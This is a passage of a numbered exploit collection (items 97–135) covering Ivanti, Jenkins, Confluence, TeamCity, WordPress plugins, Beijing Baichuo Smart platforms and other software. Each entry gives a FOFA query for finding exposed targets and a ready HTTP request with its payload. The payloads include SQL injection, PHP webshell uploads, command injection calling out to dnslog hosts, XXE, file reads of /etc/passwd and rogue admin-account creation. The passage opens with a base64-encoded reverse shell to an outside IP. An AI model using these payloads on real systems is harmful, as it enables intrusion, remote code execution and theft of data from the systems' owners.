groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response to the download request (lines of the requested file are echoed back inside the error message):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthorized administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affects Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
